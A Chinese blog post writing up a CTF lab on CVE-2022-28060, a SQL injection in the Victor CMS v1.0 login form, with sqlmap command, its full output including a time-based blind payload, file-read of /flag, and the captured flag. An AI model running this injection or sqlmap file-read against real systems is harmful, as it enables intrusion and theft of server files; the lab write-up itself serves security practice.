从此淹没在我们时间的长河|

lockly

园龄:2年3个月粉丝:25关注:3

春秋云镜 - CVE-2022-28060

Victor CMS v1.0 /includes/login.php 存在sql注入

image-20230922145820213

找到页面的登录框,看介绍应该是post类型的表单注入。

image-20230922145846902

上sqlmap用原本的梭发现ctf的那个表是空的,换用--file-read参数从目标中读取文件拿到flag。

root@Lockly temp/tmp » sqlmap -r sql.txt --file-read "/flag" --batch
___
__H__
___ ___["]_____ ___ ___ {1.7.9#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:08:44 /2023-09-22/
[15:08:44] [INFO] parsing HTTP request from 'sql.txt'
[15:08:46] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:08:46] [INFO] resuming back-end DBMS 'mysql'
[15:08:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_name=admin' AND (SELECT 4341 FROM (SELECT(SLEEP(5)))fdPd) AND 'Winx'='Winx&user_password=123455&login=
---
[15:08:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:08:47] [INFO] fingerprinting the back-end DBMS operating system
[15:08:51] [INFO] the back-end DBMS operating system is Linux
[15:08:51] [INFO] fetching file: '/flag'
[15:08:51] [INFO] retrieved:
[15:08:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[15:09:22] [INFO] adjusting time delay to 1 second due to good response times
66C61677B65613836376236362D353139332D346636642D623765302D6437643634386531643139647D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[15:16:02] [INFO] retrieved: 42
[15:16:10] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag (same file)
[15:16:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com'
[*] ending @ 15:16:10 /2023-09-22/
root@Lockly temp/tmp » cat /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag
flag{ea867b66-5193-4f6d-b7e0-d7d648e1d19d}# root@Lockly temp/tmp »

本文作者:lockly

本文链接:https://www.cnblogs.com/bktown/p/17722472.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   lockly  阅读(218)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 过客 冯泳,HAIBEAT
  2. 2 Sorry But XMASwu(吴骜)
  3. 3 每当我 ProdbyMend
每当我 - ProdbyMend
00:00 / 00:00
An audio error has occurred, player will skip forward in 2 seconds.

制作人Producer: 郜晨皓/吴家诚/罗旭

秋天走了冬天来了

又被寒风刺痛着

花瓣随风飘落

花瓣随风飘落

秋天走了冬天来了

又被寒风刺痛着

花瓣随风飘落

秋天走了冬天来了

又被寒风刺痛着